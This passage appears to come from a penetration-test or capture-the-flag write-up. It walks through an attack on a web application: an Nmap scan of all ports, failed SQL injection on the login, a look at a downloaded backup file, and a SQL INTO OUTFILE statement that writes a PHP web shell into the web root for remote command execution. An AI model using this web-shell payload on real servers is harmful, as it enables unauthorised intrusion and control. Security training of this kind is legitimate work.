I began the attack by doing some active reconnaissance on the web application using the Nmap command “ nmap -p 1–65535 -T4 -A -v”, which scans through all 65535 ports providing info on open ports and services running on them.

Login Bypass

Based on the recon done earlier, I tried out some SQLi attacks using the login parameters — had no luck there. So I decided to go back to the content of “backup.zip” file (see Figure 6) I downloaded and have a second look at it.

Gaining Shell Access/RCE

Now ultimately, the goal is to gain shell access/run commands on the remote server. So leveraging the DB access I run the following script: SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/cmd.php” which injected the file “cmd.php” into the html folder.

